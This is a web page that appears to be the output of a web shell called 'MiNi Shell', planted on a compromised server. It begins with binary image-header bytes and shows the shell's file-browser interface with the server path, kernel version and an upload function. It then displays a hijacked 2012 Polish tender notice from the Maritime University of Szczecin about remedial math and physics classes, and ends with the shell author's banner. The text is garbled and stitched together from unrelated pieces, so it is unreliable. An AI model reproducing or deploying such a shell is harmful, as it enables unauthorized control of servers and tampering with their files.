JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121005/383764-N-2012.html

<p class="kh_header"><b>Szczecin: Przeprowadzenie grupowych zajęć wyrównawczych 
z matematyki i fizyki w ramach projektu 
KIERUNKI ZAMAWIANE - Mechatronika oraz Mechanika 
i budowa maszyn w Akademii Morskiej w Szczecinie II
BZP/NN/1/2012</b><br>
<b>Numer ogłoszenia: 383764 - 2012; data zamieszczenia: 05.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Morska w Szczecinie , ul. Wały Chrobrego 1/2, 70-500 Szczecin, woj. zachodniopomorskie, tel. 91 4809400, faks 91 4809575.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie grupowych zajęć wyrównawczych 
z matematyki i fizyki w ramach projektu 
KIERUNKI ZAMAWIANE - Mechatronika oraz Mechanika 
i budowa maszyn w Akademii Morskiej w Szczecinie II
BZP/NN/1/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie grupowych zajęć wyrównawczych z matematyki i fizyki w ramach projektu KIERUNKI ZAMAWIANE - Mechatronika oraz Mechanika i budowa maszyn w Akademii Morskiej w Szczecinie II dla następujących zadań:
1)	zadanie 1- Grupowe zajęcia wyrównawcze z matematyki 
2)	zadanie 2- Grupowe zajęcia wyrównawcze z fizyki 

Tematyka zagadnień poruszanych w trakcie zajęć będzie dostosowana do potrzeb studentów. Harmonogram zajęć zostanie ustalony przed rozpoczęciem zajęć. Zajęcia wyrównawcze będą się odbywały w okresie od listopada 2012 roku do stycznia 2013 roku włącznie. Studenci będą podzieleni na 
- zadanie nr 1 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z matematyki 
oraz
- zadanie nr 2 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z fizyki. 

Wykonawca będzie zobowiązany do zapewnienia liczby trenerów umożliwiającej prowadzenie zajęć według ustalonego planu - minimum 6-ciu trenerów, po trzech z każdego prowadzonego przedmiotu. 

Każda grupa odbędzie 64 godziny lekcyjne w ramach zajęć wyrównawczych. Trener prowadzący zajęcia będzie zobowiązany do sprawdzenia listy obecności na zajęciach oraz do zebrania od uczestników zajęć czytelnych podpisów na liście. Trener będzie również zobowiązany do sporządzenia raportu podsumowującego opisującego każdego studenta, stan wiedzy przed i po zajęciach wyrównawczych, a także instrukcję dalszej pracy własnej która zostanie przekazana studentowi. Trenerzy będą na koniec zajęć oceniani przez studentów za pomocą ankiety. Liczba godzin zajęć wyrównawczych wyniesie:
zadanie nr 1 - 320 godzin zajęć wyrównawczych z matematyki 
oraz
zadanie nr 2 - 320 godzin wyrównawczych z fizyki, 

Podział godzinowy na poszczególne miesiące będzie wynikał bezpośrednio z ustalonego przez Zamawiającego planu zajęć. Wszystkie zajęcia wyrównawcze muszą zakończyć się do dnia 25.01.2013r. Rozliczenie za realizację zajęć nastąpi na podstawie złożonej przez wykonawcę faktury/rachunku wraz z kartami czasu pracy trenerów i listami obecności w terminie 14 dni od daty wpływu faktury/rachunku do kancelarii AM. Zamawiający przewiduje możliwość zmiany trenerów prowadzących zajęcia w przypadkach losowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia. Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował minimum 3 trenerami (osobami) w zakresie każdego zadania, które:
W zakresie zadania nr 1:
a)	posiadają wykształcenie wyższe - tytuł inżyniera lub magistra matematyki, 
lub
b)	posiadają status najlepszego studenta 5 roku kierunku matematyka,
W zakresie zadania nr 2:
a)	posiadają wykształcenie wyższe - tytuł inżyniera lub magistra fizyki, 
lub
b)	posiadają status najlepszego studenta 5 roku kierunku fizyki. 
Pod pojęciem najlepszego studenta, Zamawiający rozumie taką osobę, która w roku akademickim 2011/2012 mieściła się w grupie 20 % studentów z najlepszą średnią ocen lub osoba, która w roku akademickim 2011/2012 otrzymywała stypendium naukowe</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Liczba trenerów - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy wymaga formy pisemnej, pod rygorem nieważności, za zgodą obu Stron.
2.	Zmiany zawartej umowy mogą nastąpić w przypadku, gdy:
a)	ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia przez Wykonawcę;
b)	wystąpią przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej) np. pogoda uniemożliwiająca wykonywanie umowy, zdarzenia nie leżące po żadnej ze stron umowy. Strony mają prawo do skorygowania uzgodnionych zobowiązań i przesunąć termin realizacji maksymalnie o czas trwania siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód;
c)	nastąpiła zmiana stawki podatku od towarów i usług VAT. W takim przypadku umowa ulegnie zmianie w zakresie wysokości ceny netto z zastrzeżeniem, iż cena brutto nie ulegnie zmianie.
d)	Zamawiający dopuszcza  zmianę harmonogramu projektu w ramach terminu realizacji zamówienia. 
3.	Wzór umowy zlecenie stanowi załącznik nr 6 do niniejszej SIWZ.
4.	Strony dopuszczają możliwość zmian redakcyjnych oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych.
5.	Strony dopuszczają możliwość zmiany trenerów prowadzących zgodnie z § 2 ust. 1 lit b umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bzp.am.szczecin.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Morska w Szczecinie, ul. Wały Chrobrego 1-2, 70-500 Szczecin,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2012 godzina 09:45, miejsce: Akademia Morska w Szczecinie, Kancelaria pok. 73a., ul. Wały Chrobrego 1-2, 70-500 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt KIERUNKI ZAMAWIANE - Mechatronika oraz Mechanika i budowa maszyn w Akademii Morskiej w Szczecinie II współfinansowany z środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupowe zajęcia wyrównawcze z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka zagadnień poruszanych w trakcie zajęć będzie dostosowana do potrzeb studentów. Harmonogram zajęć zostanie ustalony przed rozpoczęciem zajęć. Zajęcia wyrównawcze będą się odbywały w okresie od listopada 2012 roku do stycznia 2013 roku włącznie. Studenci będą podzieleni na 
- zadanie nr 1 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z matematyki 
oraz
- zadanie nr 2 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z fizyki. 

Wykonawca będzie zobowiązany do zapewnienia liczby trenerów umożliwiającej prowadzenie zajęć według ustalonego planu - minimum 6-ciu trenerów, po trzech z każdego prowadzonego przedmiotu. 

Każda grupa odbędzie 64 godziny lekcyjne w ramach zajęć wyrównawczych. Trener prowadzący zajęcia będzie zobowiązany do sprawdzenia listy obecności na zajęciach oraz do zebrania od uczestników zajęć czytelnych podpisów na liście. Trener będzie również zobowiązany do sporządzenia raportu podsumowującego opisującego każdego studenta, stan wiedzy przed i po zajęciach wyrównawczych, a także instrukcję dalszej pracy własnej która zostanie przekazana studentowi. Trenerzy będą na koniec zajęć oceniani przez studentów za pomocą ankiety. Liczba godzin zajęć wyrównawczych wyniesie:
zadanie nr 1 - 320 godzin zajęć wyrównawczych z matematyki 
oraz
zadanie nr 2 - 320 godzin wyrównawczych z fizyki, 

Podział godzinowy na poszczególne miesiące będzie wynikał bezpośrednio z ustalonego przez Zamawiającego planu zajęć. Wszystkie zajęcia wyrównawcze muszą zakończyć się do dnia 25.01.2013r. Rozliczenie za realizację zajęć nastąpi na podstawie złożonej przez wykonawcę faktury/rachunku wraz z kartami czasu pracy trenerów i listami obecności w terminie 14 dni od daty wpływu faktury/rachunku do kancelarii AM. Zamawiający przewiduje możliwość zmiany trenerów prowadzących zajęcia w przypadkach losowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba trenerów - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2)	zadanie 2- Grupowe zajęcia wyrównawcze z fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka zagadnień poruszanych w trakcie zajęć będzie dostosowana do potrzeb studentów. Harmonogram zajęć zostanie ustalony przed rozpoczęciem zajęć. Zajęcia wyrównawcze będą się odbywały w okresie od listopada 2012 roku do stycznia 2013 roku włącznie. Studenci będą podzieleni na 
- zadanie nr 1 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z matematyki 
oraz
- zadanie nr 2 - 5 grup 6-cio osobowych na zajęcia wyrównawcze z fizyki. 

Wykonawca będzie zobowiązany do zapewnienia liczby trenerów umożliwiającej prowadzenie zajęć według ustalonego planu - minimum 6-ciu trenerów, po trzech z każdego prowadzonego przedmiotu. 

Każda grupa odbędzie 64 godziny lekcyjne w ramach zajęć wyrównawczych. Trener prowadzący zajęcia będzie zobowiązany do sprawdzenia listy obecności na zajęciach oraz do zebrania od uczestników zajęć czytelnych podpisów na liście. Trener będzie również zobowiązany do sporządzenia raportu podsumowującego opisującego każdego studenta, stan wiedzy przed i po zajęciach wyrównawczych, a także instrukcję dalszej pracy własnej która zostanie przekazana studentowi. Trenerzy będą na koniec zajęć oceniani przez studentów za pomocą ankiety. Liczba godzin zajęć wyrównawczych wyniesie:
zadanie nr 1 - 320 godzin zajęć wyrównawczych z matematyki 
oraz
zadanie nr 2 - 320 godzin wyrównawczych z fizyki, 

Podział godzinowy na poszczególne miesiące będzie wynikał bezpośrednio z ustalonego przez Zamawiającego planu zajęć. Wszystkie zajęcia wyrównawcze muszą zakończyć się do dnia 25.01.2013r. Rozliczenie za realizację zajęć nastąpi na podstawie złożonej przez wykonawcę faktury/rachunku wraz z kartami czasu pracy trenerów i listami obecności w terminie 14 dni od daty wpływu faktury/rachunku do kancelarii AM. Zamawiający przewiduje możliwość zmiany trenerów prowadzących zajęcia w przypadkach losowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Liczba trenerów - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com